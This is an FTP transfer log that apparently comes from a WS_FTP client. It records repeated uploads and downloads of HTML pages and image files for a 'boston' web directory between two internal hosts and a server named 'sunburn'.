10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
